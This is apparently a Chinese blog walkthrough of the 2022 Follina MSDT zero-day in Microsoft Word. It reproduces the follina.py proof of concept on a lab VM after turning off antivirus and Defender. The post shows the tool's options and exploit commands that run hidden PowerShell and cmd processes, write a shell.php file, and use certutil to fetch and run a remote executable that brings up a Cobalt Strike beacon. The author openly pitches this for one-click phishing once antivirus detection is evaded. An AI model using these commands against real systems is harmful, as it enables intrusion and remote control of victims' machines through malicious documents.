微軟MSDT零日漏洞上線CS
發(fā)布時(shí)間 2022-06-02一、漏洞簡(jiǎn)介
近日,網(wǎng)絡(luò)安全研究員nao_sec發(fā)現(xiàn)了一個(gè)從白俄羅斯上傳至分析服務(wù)網(wǎng)站VirusTotal的惡意Word文檔(文件名為" 05-2022-0438.doc ")。這個(gè)文檔使用遠(yuǎn)程模板特性獲取HTML,然后使用“ms-msdt”方案執(zhí)行PowerShell代碼。
隨后,知名網(wǎng)絡(luò)安全專家Kevin Beaumont發(fā)表了對(duì)該漏洞的分析?!霸撐臋n使用 Word遠(yuǎn)程模板功能從遠(yuǎn)程網(wǎng)絡(luò)服務(wù)器檢索HTML文件,該服務(wù)器又使用ms-msdt MSProtocol URI方案加載一些代碼并執(zhí)行一些 PowerShell”,在他的分析中這樣寫道,“這里發(fā)生的一些事情比較復(fù)雜,而首當(dāng)其沖的問題是即使禁用了宏,Microsoft Word 也會(huì)通過msdt(一種支持工具)執(zhí)行代碼。受保護(hù)的視圖確實(shí)起了作用,可盡管如果您將文檔更改為RTF形式,它甚至無需打開文檔,僅通過資源管理器中的預(yù)覽選項(xiàng)卡即可運(yùn)行,更不用說受保護(hù)的視圖了?!?/p>
二、影響范圍
據(jù)了解,該零日漏洞會(huì)影響多個(gè)Microsoft Office版本,包括Office、Office2016和Office 2021。
以上說明來源:https://www.freebuf.com/articles/334861.html
復(fù)現(xiàn)運(yùn)行環(huán)境應(yīng)該關(guān)閉防火墻殺毒軟件等安全應(yīng)用,會(huì)被攔截;
POC來源地址:https://github.com/chvancooten/follina.py
三、使用說明
python .\follina.py -h 用法:follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] [-u URL] [-H HOST] [-p PORT] 選項(xiàng): -h, --help 顯示此幫助信息并退出 所需參數(shù): -m {命令,二進(jìn)制},--mode {命令,二進(jìn)制} 執(zhí)行模式,可以是“二進(jìn)制”以加載(遠(yuǎn)程)二進(jìn)制文件,或“命令”以運(yùn)行編碼的 PS 命令 二進(jìn)制執(zhí)行參數(shù): -b 二進(jìn)制,--二進(jìn)制二進(jìn)制 命令執(zhí)行參數(shù): -c 命令,--command 命令 在“命令”模式下執(zhí)行的編碼命令 可選參數(shù): -u URL, --url URL 生成的文檔應(yīng)該在其中檢索您的有效負(fù)載的主機(jī)名或 IP 地址,默認(rèn)為“l(fā)ocalhost” -H HOST, --host HOST Web服務(wù)器監(jiān)聽的接口,默認(rèn)為所有接口(0.0.0.0) -p PORT, --port PORT 運(yùn)行 HTTP 服務(wù)器的端口,默認(rèn)為 80
使用舉例:
# 執(zhí)行本地二進(jìn)制 python .\follina.py -m 二進(jìn)制 -b \windows\system32\calc.exe # 在 linux 上你可能需要轉(zhuǎn)義反斜杠 python .\follina.py -m 二進(jìn)制 -b \\windows\\system32\\calc.exe # 從文件共享中執(zhí)行二進(jìn)制文件 python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe # 執(zhí)行任意powershell命令 python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echoowned > c:\users\public\owned.txt'" # 在默認(rèn)接口(所有接口,0.0.0.0)上運(yùn)行 Web 服務(wù)器,但告訴惡意文檔在 http://1.2.3.4/exploit.html 檢索它 python .\follina.py -m 二進(jìn)制 -b \windows\system32\calc.exe -u 1.2.3.4 # 只在 localhost 上運(yùn)行網(wǎng)絡(luò)服務(wù)器,在端口 8080 而不是 80 python .\follina.py -m 二進(jìn)制 -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080
四、環(huán)境配置
虛擬機(jī)Windows server 2019(請(qǐng)?jiān)跍y(cè)試環(huán)境運(yùn)行)
OFFICE 2019專業(yè)版
關(guān)閉火絨等殺毒軟件、關(guān)閉Defender
五、上線過程
第一次運(yùn)行會(huì)生成clickme.docx文件以及WWW文件夾,exploit.html文件就在WWW文件夾里面, -WindowStyle hidden -ArgumentList是靜默運(yùn)行,所以看不到cmd界面,更加隱蔽。
命令:python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe 會(huì)彈出計(jì)算器,說明漏洞復(fù)現(xiàn)成功,如下:
既然可以彈出計(jì)算器,我有一個(gè)思路,寫入shell文件或者執(zhí)行CMD,并執(zhí)行命令進(jìn)行遠(yuǎn)程服務(wù)器下載CS木馬運(yùn)行,這樣就能夠達(dá)到點(diǎn)擊即上線,釣魚一絕(不考慮查殺原因)。
寫入shell.php
命令:python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo cmd_test > c:\users\public\shell.php'" 如下
上線運(yùn)行CS
命令:python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c certutil -urlcache -split -f http://127.0.0.1:8080/test.exe&start test.exe'"
六、總結(jié)
總體來說如果能夠解決報(bào)毒問題,該漏洞還是有較大的操作空間。